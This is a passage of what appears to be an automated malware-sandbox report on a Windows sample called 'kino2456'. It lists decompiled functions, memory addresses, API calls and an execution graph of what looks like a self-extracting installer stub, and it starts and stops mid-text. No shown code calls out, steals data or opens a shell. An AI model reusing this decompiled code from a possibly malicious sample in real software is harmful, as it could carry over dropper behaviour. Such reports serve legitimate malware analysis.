								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                                                    0x0096368c
                                                                                                                                                                                                                                    0x0096368f
                                                                                                                                                                                                                                    0x00963691
                                                                                                                                                                                                                                    0x0096369f
                                                                                                                                                                                                                                    0x009636a7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009636ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009636bc
                                                                                                                                                                                                                                    0x009636bc
                                                                                                                                                                                                                                    0x009636c0
                                                                                                                                                                                                                                    0x009636cb
                                                                                                                                                                                                                                    0x009636c2
                                                                                                                                                                                                                                    0x009636c4
                                                                                                                                                                                                                                    0x009636c4
                                                                                                                                                                                                                                    0x009636da
                                                                                                                                                                                                                                    0x009636e0
                                                                                                                                                                                                                                    0x009636e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009636e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009636ba
                                                                                                                                                                                                                                    0x009636ed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0096369F
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009636B2
                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 009636CB
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009636DA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                                                    • Opcode ID: 33adad63413a4d2f48042cce36d58e13e0b0f5a237e47887d810a06747e95931
                                                                                                                                                                                                                                    • Instruction ID: 7ca420f7171ad7d025bfd66b80848ed7346718a704a86febe595a365c118afa0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33adad63413a4d2f48042cce36d58e13e0b0f5a237e47887d810a06747e95931
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F01A7729082157BDB304BA69C49EEB76BCEBC6B10F00411DF905F2180D5A5D640DA60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00966517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E00966517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x969a3c; // 0x960000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E009644B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                                                    0x0096651f
                                                                                                                                                                                                                                    0x0096652a
                                                                                                                                                                                                                                    0x00966534
                                                                                                                                                                                                                                    0x0096656b
                                                                                                                                                                                                                                    0x00966577
                                                                                                                                                                                                                                    0x0096657c
                                                                                                                                                                                                                                    0x00966536
                                                                                                                                                                                                                                    0x0096653e
                                                                                                                                                                                                                                    0x00966542
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966544
                                                                                                                                                                                                                                    0x00966547
                                                                                                                                                                                                                                    0x0096654c
                                                                                                                                                                                                                                    0x00966549
                                                                                                                                                                                                                                    0x00966549
                                                                                                                                                                                                                                    0x00966549
                                                                                                                                                                                                                                    0x0096655e
                                                                                                                                                                                                                                    0x00966560
                                                                                                                                                                                                                                    0x00966569
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966569
                                                                                                                                                                                                                                    0x00966542
                                                                                                                                                                                                                                    0x00966587

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00960000,000007D6,00000005), ref: 0096652A
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00960000,00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00966538
                                                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00960000,00000000,00000547,009619E0,00000000), ref: 00966557
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00966560
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1214682469-0
                                                                                                                                                                                                                                    • Opcode ID: 3b0b9bd87d5745e599333eb5582e71d32f28faac536f68ac7a5923cbc3cd1c43
                                                                                                                                                                                                                                    • Instruction ID: d8203e524f834720c5a63791f6e898b2461e6c246a80b27ee927073f1568d0c4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b0b9bd87d5745e599333eb5582e71d32f28faac536f68ac7a5923cbc3cd1c43
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E01F973104615BBDB106FA99C49DBB7AACEBC6761F010129FE11E3150DBB1CD10EAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009665E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E009665E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                                                    0x009665e8
                                                                                                                                                                                                                                    0x009665ed
                                                                                                                                                                                                                                    0x009665ef
                                                                                                                                                                                                                                    0x009665f2
                                                                                                                                                                                                                                    0x009665f4
                                                                                                                                                                                                                                    0x009665f4
                                                                                                                                                                                                                                    0x009665f6
                                                                                                                                                                                                                                    0x009665f7
                                                                                                                                                                                                                                    0x00966608
                                                                                                                                                                                                                                    0x00966611
                                                                                                                                                                                                                                    0x00966618
                                                                                                                                                                                                                                    0x0096661c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096660e
                                                                                                                                                                                                                                    0x00966623
                                                                                                                                                                                                                                    0x00966625
                                                                                                                                                                                                                                    0x0096663b
                                                                                                                                                                                                                                    0x0096663b
                                                                                                                                                                                                                                    0x0096663d
                                                                                                                                                                                                                                    0x00966641
                                                                                                                                                                                                                                    0x00966610
                                                                                                                                                                                                                                    0x00966610
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966610
                                                                                                                                                                                                                                    0x00966644
                                                                                                                                                                                                                                    0x00966647
                                                                                                                                                                                                                                    0x00966647
                                                                                                                                                                                                                                    0x00966621
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00962B33), ref: 00966602
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00966612
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00966629
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00966635
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                                                    • Opcode ID: 566102eb8426ccf2dc3604a2384d704f69e33cac07faa6a2700c7384031c77c0
                                                                                                                                                                                                                                    • Instruction ID: 9cdbbddc89e6f22afd72a0bc3f64e3ce97bcf01eb9626828ad9246c67f33afca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 566102eb8426ccf2dc3604a2384d704f69e33cac07faa6a2700c7384031c77c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F028320081506EE7321B28EC888BBBF9CDF87354B2A01AFE492A2001D6A50D069B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009669B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E009669B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x9681f8 = E00966C70();
				__set_app_type(E00966FBE(2));
				 *0x9688a4 =  *0x9688a4 | 0xffffffff;
				 *0x9688a8 =  *0x9688a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x968528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x96851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00967000();
				if( *0x968000 == 0) {
					__setusermatherr(E00967000);
				}
				E009671EF(_t6);
				return 0;
			}








                                                                                                                                                                                                                                    0x009669b7
                                                                                                                                                                                                                                    0x009669c2
                                                                                                                                                                                                                                    0x009669c8
                                                                                                                                                                                                                                    0x009669cf
                                                                                                                                                                                                                                    0x009669d8
                                                                                                                                                                                                                                    0x009669de
                                                                                                                                                                                                                                    0x009669e4
                                                                                                                                                                                                                                    0x009669e6
                                                                                                                                                                                                                                    0x009669ec
                                                                                                                                                                                                                                    0x009669f2
                                                                                                                                                                                                                                    0x009669f4
                                                                                                                                                                                                                                    0x00966a00
                                                                                                                                                                                                                                    0x00966a07
                                                                                                                                                                                                                                    0x00966a0d
                                                                                                                                                                                                                                    0x00966a0e
                                                                                                                                                                                                                                    0x00966a15

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00966FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00966FC5
                                                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 009669C2
                                                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 009669D8
                                                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 009669E6
                                                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 00966A07
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                                                    • Opcode ID: 55a655224e96dadac37fa57e7b80c7eac64952b402039b2385cf15e585c4c993
                                                                                                                                                                                                                                    • Instruction ID: 251a4bf9a83a470c3bac75d46d6870cdb1e93a6138fdb1d0fbe55985de4bf9e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55a655224e96dadac37fa57e7b80c7eac64952b402039b2385cf15e585c4c993
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AF0F8701AC3019FC714AF70ED1A6067BA1FB85325B10075DE472962F0CFBA8540AE11
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:26.9%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                    Total number of Nodes:967
                                                                                                                                                                                                                                    Total number of Limit Nodes:41
                                                                                                                                                                                                                                    execution_graph 2196 194ad0 2204 193680 2196->2204 2199 194ae9 2200 194aee WriteFile 2201 194b0f 2200->2201 2202 194b14 2200->2202 2202->2201 2203 194b3b SendDlgItemMessageA 2202->2203 2203->2201 2205 193691 MsgWaitForMultipleObjects 2204->2205 2206 1936a9 PeekMessageA 2205->2206 2207 1936e8 2205->2207 2206->2205 2208 1936bc 2206->2208 2207->2199 2207->2200 2208->2205 2208->2207 2209 1936c7 DispatchMessageA 2208->2209 2210 1936d1 PeekMessageA 2208->2210 2209->2210 2210->2208 2211 194cd0 2212 194cf4 2211->2212 2214 194d0b 2211->2214 2213 194d02 2212->2213 2215 194b60 FindCloseChangeNotification 2212->2215 2268 196ce0 2213->2268 2214->2213 2217 194dcb 2214->2217 2220 194d25 2214->2220 2215->2213 2218 194dd4 SetDlgItemTextA 2217->2218 2221 194de3 2217->2221 2218->2221 2219 194e95 2220->2213 2234 194c37 2220->2234 2221->2213 2242 19476d 2221->2242 2224 194e38 2224->2213 2251 194980 2224->2251 2230 194e64 2259 1947e0 LocalAlloc 2230->2259 2233 194e6f 2233->2213 2235 194c88 2234->2235 2236 194c4c DosDateTimeToFileTime 2234->2236 2235->2213 2239 194b60 2235->2239 2236->2235 2237 194c5e LocalFileTimeToFileTime 2236->2237 2237->2235 2238 194c70 SetFileTime 2237->2238 2238->2235 2240 194b92 FindCloseChangeNotification 2239->2240 2241 194b76 SetFileAttributesA 2239->2241 2240->2241 2241->2213 2273 1966ae GetFileAttributesA 2242->2273 2244 19477b 2244->2224 2246 1947cc SetFileAttributesA 2247 1947db 2246->2247 2247->2224 2250 1947c2 2250->2246 2252 194990 2251->2252 2253 1949c2 lstrcmpA 2252->2253 2254 1949a5 2252->2254 2255 194a0e 2253->2255 2258 1949ba 2253->2258 2256 1944b9 20 API calls 2254->2256 2255->2258 2338 19487a 2255->2338 2256->2258 2258->2213 2258->2230 2260 19480f LocalAlloc 2259->2260 2261 1947f6 2259->2261 2264 194831 2260->2264 2267 19480b 2260->2267 2262 1944b9 20 API calls 2261->2262 2262->2267 2265 1944b9 20 API calls 2264->2265 2266 194846 LocalFree 2265->2266 2266->2267 2267->2233 2269 196ce8 2268->2269 2270 196ceb 2268->2270 2269->2219 2351 196cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2270->2351 2272 196e26 2272->2219 2274 194777 2273->2274 2274->2244 2274->2246 2275 196517 FindResourceA 2274->2275 2276 19656b 2275->2276 2277 196536 LoadResource 2275->2277 2282 1944b9 2276->2282 2277->2276 2278 196544 DialogBoxIndirectParamA FreeResource 2277->2278 2278->2276 2280 1947b1 2278->2280 2280->2246 2280->2247 2280->2250 2283 1944fe LoadStringA 2282->2283 2294 19455a 2282->2294 2284 194562 2283->2284 2285 194527 2283->2285 2290 1945c9 2284->2290 2295 19457e LocalAlloc 2284->2295 2311 19681f 2285->2311 2287 196ce0 4 API calls 2288 194689 2287->2288 2288->2280 2292 194607 LocalAlloc 2290->2292 2297 1945cd 2290->2297 2292->2294 2305 1945c4 2292->2305 2294->2287 2295->2294 2304 1945af 2295->2304 2296 194536 MessageBoxA 2296->2294 2297->2297 2298 1945d9 LocalAlloc 2297->2298 2298->2294 2301 1945f3 2298->2301 2299 19462d MessageBeep 2303 19681f 10 API calls 2299->2303 2302 19171e _vsnprintf 2301->2302 2302->2305 2306 19463b 2303->2306 2328 19171e 2304->2328 2305->2299 2308 194645 MessageBoxA LocalFree 2306->2308 2309 1967c9 EnumResourceLanguagesA 2306->2309 2308->2294 2309->2308 2312 196857 GetVersionExA 2311->2312 2321 19691a 2311->2321 2314 19687c 2312->2314 2312->2321 2313 196ce0 4 API calls 2315 19452c 2313->2315 2316 1968a5 GetSystemMetrics 2314->2316 2314->2321 2315->2296 2322 1967c9 2315->2322 2317 1968b5 RegOpenKeyExA 2316->2317 2316->2321 2318 1968d6 RegQueryValueExA RegCloseKey 2317->2318 2317->2321 2319 19690c 2318->2319 2318->2321 2332 1966f9 2319->2332 2321->2313 2323 1967e2 2322->2323 2324 196803 2322->2324 2336 196793 EnumResourceLanguagesA 2323->2336 2324->2296 2326 1967f5 2326->2324 2337 196793 EnumResourceLanguagesA 2326->2337 2329 19172d 2328->2329 2330 19173d _vsnprintf 2329->2330 2331 19175d 2329->2331 2330->2331 2331->2305 2333 19670f 2332->2333 2334 196740 CharNextA 2333->2334 2335 19674b 2333->2335 2334->2333 2335->2321 2336->2326 2337->2324 2339 1948a2 CreateFileA 2338->2339 2341 1948e9 2339->2341 2342 194908 2339->2342 2341->2342 2343 1948ee 2341->2343 2342->2258 2346 19490c 2343->2346 2347 1948f5 CreateFileA 2346->2347 2348 194917 2346->2348 2347->2342 2348->2347 2349 194962 CharNextA 2348->2349 2350 194953 CreateDirectoryA 2348->2350 2349->2348 2350->2349 2351->2272 3128 193210 3129 193227 3128->3129 3153 19328e EndDialog 3128->3153 3130 1933e2 GetDesktopWindow 3129->3130 3131 193235 3129->3131 3181 1943d0 6 API calls 3130->3181 3133 193239 3131->3133 3135 1932dd GetDlgItemTextA 3131->3135 3136 19324c 3131->3136 3142 193366 3135->3142 3147 1932fc 3135->3147 3139 193251 3136->3139 3140 1932c5 EndDialog 3136->3140 3138 19341f GetDlgItem EnableWindow 3138->3133 3139->3133 3141 19325c LoadStringA 3139->3141 3140->3133 3143 19327b 3141->3143 3144 193294 3141->3144 3145 1944b9 20 API calls 3142->3145 3149 1944b9 20 API calls 3143->3149 3166 194224 LoadLibraryA 3144->3166 3145->3133 3147->3142 3148 193331 GetFileAttributesA 3147->3148 3151 19337c 3148->3151 3152 19333f 3148->3152 3149->3153 3155 19658a CharPrevA 3151->3155 3156 1944b9 20 API calls 3152->3156 3153->3133 3154 1932a5 SetDlgItemTextA 3154->3133 3154->3143 3157 19338d 3155->3157 3158 193351 3156->3158 3159 1958c8 27 API calls 3157->3159 3158->3133 3160 19335a CreateDirectoryA 3158->3160 3161 193394 3159->3161 3160->3142 3160->3151 3161->3142 3162 1933a4 3161->3162 3163 1933c7 EndDialog 3162->3163 3164 19597d 34 API calls 3162->3164 3163->3133 3165 1933c3 3164->3165 3165->3133 3165->3163 3167 1943b2 3166->3167 3168 194246 GetProcAddress 3166->3168 3172 1944b9 20 API calls 3167->3172 3169 19425d GetProcAddress 3168->3169 3170 1943a4 FreeLibrary 3168->3170 3169->3170 3171 194274 GetProcAddress 3169->3171 3170->3167 3171->3170 3174 19428b 3171->3174 3173 19329d 3172->3173 3173->3133 3173->3154 3175 194295 GetTempPathA 3174->3175 3176 1942e1 3174->3176 3177 1942ad 3175->3177 3180 194390 FreeLibrary 3176->3180 3177->3177 3178 1942b4 CharPrevA 3177->3178 3178->3176 3179 1942d0 CharPrevA 3178->3179 3179->3176 3180->3173 3183 194463 SetWindowPos 3181->3183 3184 196ce0 4 API calls 3183->3184 3185 1933f1 SetWindowTextA SendDlgItemMessageA 3184->3185 3185->3133 3185->3138 3186 194a50 3187 194a9f ReadFile 3186->3187 3188 194a66 3186->3188 3190 194abb 3187->3190 3189 194a82 memcpy 3188->3189 3188->3190 3189->3190 3191 193450 3192 19345e 3191->3192 3193 1934d3 EndDialog 3191->3193 3195 19349a GetDesktopWindow 3192->3195 3196 193465 3192->3196 3194 19346a 3193->3194 3197 1943d0 11 API calls 3195->3197 3196->3194 3199 19348c EndDialog 3196->3199 3198 1934ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3197->3198 3198->3194 3199->3194 2352 196f40 SetUnhandledExceptionFilter 2353 194cc0 GlobalFree 3200 194200 3201 19420b SendMessageA 3200->3201 3202 19421e 3200->3202 3201->3202 3203 193100 3204 193111 3203->3204 3205 1931b0 3203->3205 3207 193149 GetDesktopWindow 3204->3207 3210 19311d 3204->3210 3206 1931b9 SendDlgItemMessageA 3205->3206 3211 193141 3205->3211 3206->3211 3209 1943d0 11 API calls 3207->3209 3208 193138 EndDialog 3208->3211 3212 19315d 6 API calls 3209->3212 3210->3208 3210->3211 3212->3211 3213 194bc0 3215 194bd7 3213->3215 3216 194c05 3213->3216 3214 194c1b SetFilePointer 3214->3215 3216->3214 3216->3215 3217 1930c0 3218 1930de CallWindowProcA 3217->3218 3219 1930ce 3217->3219 3220 1930da 3218->3220 3219->3218 3219->3220 3221 1963c0 3222 196407 3221->3222 3223 19658a CharPrevA 3222->3223 3224 196415 CreateFileA 3223->3224 3225 196448 WriteFile 3224->3225 3226 19643a 3224->3226 3227 196465 CloseHandle 3225->3227 3229 196ce0 4 API calls 3226->3229 3227->3226 3230 19648f 3229->3230 3231 196c03 3232 196c1e 3231->3232 3233 196c17 _exit 3231->3233 3234 196c27 _cexit 3232->3234 3235 196c32 3232->3235 3233->3232 3234->3235 3236 197270 _except_handler4_common 3237 1969b0 3238 1969b5 3237->3238 3246 196fbe GetModuleHandleW 3238->3246 3240 1969c1 __set_app_type __p__fmode __p__commode 3241 1969f9 3240->3241 3242 196a0e 3241->3242 3243 196a02 __setusermatherr 3241->3243 3248 1971ef _controlfp 3242->3248 3243->3242 3245 196a13 3247 196fcf 3246->3247 3247->3240 3248->3245 3249 1934f0 3250 193504 3249->3250 3268 1935b8 3249->3268 3251 19351b 3250->3251 3252 1935be GetDesktopWindow 3250->3252 3250->3268 3255 19354f 3251->3255 3256 19351f 3251->3256 3254 1943d0 11 API calls 3252->3254 3253 193526 3258 1935d6 3254->3258 3255->3253 3260 193559 ResetEvent 3255->3260 3256->3253 3259 19352d TerminateThread EndDialog 3256->3259 3257 193671 EndDialog 3257->3253 3261 19361d SetWindowTextA CreateThread 3258->3261 3262 1935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3258->3262 3259->3253 3263 1944b9 20 API calls 3260->3263 3261->3253 3264 193646 3261->3264 3262->3261 3265 193581 3263->3265 3266 1944b9 20 API calls 3264->3266 3267 19359b SetEvent 3265->3267 3269 19358a SetEvent 3265->3269 3266->3268 3270 193680 4 API calls 3267->3270 3268->3253 3268->3257 3269->3253 3270->3268 3271 196ef0 3272 196f2d 3271->3272 3274 196f02 3271->3274 3273 196f27 ?terminate@ 3273->3272 3274->3272 3274->3273 3275 196bef _XcptFilter 2354 194ca0 GlobalAlloc 2355 196a60 2372 197155 2355->2372 2357 196a65 2358 196a76 GetStartupInfoW 2357->2358 2359 196a93 2358->2359 2360 196aa8 2359->2360 2361 196aaf Sleep 2359->2361 2362 196ac7 _amsg_exit 2360->2362 2363 196ad1 2360->2363 2361->2359 2362->2363 2364 196b13 _initterm 2363->2364 2366 196af4 2363->2366 2370 196b2e __IsNonwritableInCurrentImage 2363->2370 2364->2370 2365 196bd6 _ismbblead 2365->2370 2367 196c1e 2367->2366 2369 196c27 _cexit 2367->2369 2369->2366 2370->2365 2370->2367 2371 196bbe exit 2370->2371 2377 192bfb GetVersion 2370->2377 2371->2370 2373 19717a 2372->2373 2374 19717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2374 2373->2374 2375 1971e2 2373->2375 2376 1971cd 2374->2376 2375->2357 2376->2375 2378 192c0f 2377->2378 2379 192c50 2377->2379 2378->2379 2381 192c13 GetModuleHandleW 2378->2381 2394 192caa memset memset memset 2379->2394 2381->2379 2382 192c22 GetProcAddress 2381->2382 2382->2379 2388 192c34 2382->2388 2384 192c8e 2385 192c9e 2384->2385 2386 192c97 CloseHandle 2384->2386 2385->2370 2386->2385 2388->2379 2392 192c89 2489 191f90 2392->2489 2506 19468f FindResourceA SizeofResource 2394->2506 2397 192e30 2399 1944b9 20 API calls 2397->2399 2398 192d2d CreateEventA SetEvent 2400 19468f 7 API calls 2398->2400 2402 192f06 2399->2402 2401 192d57 2400->2401 2403 192d5b 2401->2403 2404 192d7d 2401->2404 2407 196ce0 4 API calls 2402->2407 2405 1944b9 20 API calls 2403->2405 2406 192e1f 2404->2406 2410 19468f 7 API calls 2404->2410 2408 192d6e 2405->2408 2511 195c9e 2406->2511 2411 192c62 2407->2411 2408->2402 2413 192d9f 2410->2413 2411->2384 2435 192f1d 2411->2435 2413->2403 2415 192da3 CreateMutexA 2413->2415 2414 192e3a 2416 192e43 2414->2416 2417 192e52 FindResourceA 2414->2417 2415->2406 2418 192dbd GetLastError 2415->2418 2537 192390 2416->2537 2421 192e6e 2417->2421 2422 192e64 LoadResource 2417->2422 2418->2406 2420 192dca 2418->2420 2423 192dea 2420->2423 2424 192dd5 2420->2424 2421->2408 2552 1936ee GetVersionExA 2421->2552 2422->2421 2426 1944b9 20 API calls 2423->2426 2425 1944b9 20 API calls 2424->2425 2429 192de8 2425->2429 2427 192dff 2426->2427 2427->2406 2430 192e04 CloseHandle 2427->2430 2429->2430 2430->2402 2434 196517 24 API calls 2434->2408 2436 192f6c 2435->2436 2437 192f3f 2435->2437 2661 195164 2436->2661 2439 192f5f 2437->2439 2641 1951e5 2437->2641 2794 193a3f 2439->2794 2441 192f71 2444 193041 2441->2444 2676 1955a0 2441->2676 2448 196ce0 4 API calls 2444->2448 2450 192c6b 2448->2450 2449 192f86 GetSystemDirectoryA 2451 19658a CharPrevA 2449->2451 2476 